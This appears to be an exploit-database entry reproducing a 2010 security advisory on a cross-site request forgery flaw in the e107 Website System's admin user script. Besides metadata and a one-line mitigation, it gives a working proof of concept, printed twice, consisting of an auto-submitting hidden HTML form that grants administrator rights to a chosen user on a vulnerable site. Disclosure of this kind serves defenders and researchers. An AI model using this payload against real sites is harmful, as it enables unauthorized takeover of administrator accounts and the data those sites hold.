header-logo
Suggest Exploit
vendor:
e107 Website System
by:
High-Tech Bridge SA
5,5
CVSS
MEDIUM
CSRF (Cross-Site Request Forgery)
352
CWE
Product Name: e107 Website System
Affected Version From: 0.7.19
Affected Version To: Prior Versions
Patch Exists: NO
Related CWE: N/A
CPE: e107:e107_website_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

HTB22344

The vulnerability exists due to failure in the /e107_admin/users.php script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: <form method=POST action=http://host/e107_admin/users.php name=main> <input type=hidden name=userid value=2> <input type=hidden name=userip value=1.2.3.4> <input type=hidden name=useraction value=admin> </form> <script>document.main.submit();</script>

Mitigation:

Implement proper input validation and authentication checks to verify the source of HTTP requests.
Source

Exploit-DB raw data:

Vulnerability ID: HTB22344

Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_e107.html

Product: e107 Website System

Vendor: e107

Vulnerable Version: 0.7.19 and Probably Prior Versions Vendor Notification:
05 April 2010 Vulnerability Type: CSRF (Cross-Site Request Forgery)

Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level:
Medium

Credit: High-Tech Bridge SA (http://www.htbridge.ch/)



Vulnerability Details:

The vulnerability exists due to failure in the /e107_admin/users.php script
to properly verify the source of HTTP request.



Successful exploitation of this vulnerability could result in a compromise
of the application, disclosure or modification of sensitive data.



Attacker can use browser to exploit this vulnerability. The following PoC is
available:





<form method=POST action=http://host/e107_admin/users.php name=main> <input
type=hidden name=userid value=2> <input type=hidden name=userip
value=1.2.3.4> <input type=hidden name=useraction value=admin> </form>